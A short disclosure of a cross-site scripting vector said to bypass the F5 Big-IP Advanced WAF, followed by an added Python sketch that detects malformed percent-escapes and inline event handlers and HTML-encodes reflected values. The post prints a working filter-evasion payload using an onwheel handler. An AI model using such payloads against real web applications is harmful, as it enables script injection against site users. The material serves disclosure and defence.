F5 Big-IP Advanced WAF XSS Bypass (May 2020)


    As with many WAFs, it is possible to bypass the enterprise-grade F5 Big-IP Advanced WAF using the onwheel tag attribute in the following XSS vector:
    Code:
    %22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
    Put differently, the response source shows:
    Code:
    "><P/onwheel=alert(1)>mouse wheel here<!--
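
A defender-side check for the vector in the post, added here as an example and not part of the original post: the request carries `%5K`, which is not a valid percent-escape, and the post's response shows `P` in its place. The sketch below rejects malformed escapes, flags inline event-handler attributes after decoding, and HTML-encodes reflected values; all function names are hypothetical, and it assumes the check runs in the application or a filter in front of it.

```python
import html
import re
import urllib.parse

# The request vector quoted in the post, used here only as test input.
PAGE_VECTOR = "%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--"

# A valid percent-escape is '%' followed by exactly two hex digits (RFC 3986).
# A bare '%' (e.g. "100%") is also malformed: a literal '%' must be sent as %25.
_MALFORMED_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")

# An on*= attribute inside a tag, separated by whitespace or '/'.
_EVENT_HANDLER = re.compile(r"<[^>]*[\s/]on[a-z]+\s*=", re.IGNORECASE)


def strict_percent_decode(raw: str) -> str:
    """Decode percent-escapes; raise ValueError instead of guessing at bad ones."""
    if _MALFORMED_ESCAPE.search(raw):
        raise ValueError("malformed percent-escape in input")
    # errors="strict" also rejects escapes that are not valid UTF-8.
    return urllib.parse.unquote(raw, errors="strict")


def inspect_parameter(raw: str) -> list[str]:
    """Return the findings for one raw (still encoded) parameter value."""
    findings = []
    if _MALFORMED_ESCAPE.search(raw):
        findings.append("malformed-percent-escape")
    # Lenient decode for inspection only: bad escapes stay as literal text.
    decoded = urllib.parse.unquote(raw)
    if _EVENT_HANDLER.search(decoded):
        findings.append("inline-event-handler")
    return findings


def encode_for_html(value: str) -> str:
    """Encode a reflected value so it cannot close an attribute or open a tag."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print(inspect_parameter(PAGE_VECTOR))
    print(encode_for_html('"><P/onwheel=alert(1)>mouse wheel here<!--'))
```

Output encoding at the point of reflection is the control that holds even when a filter in front of the application decodes the request differently from the application itself.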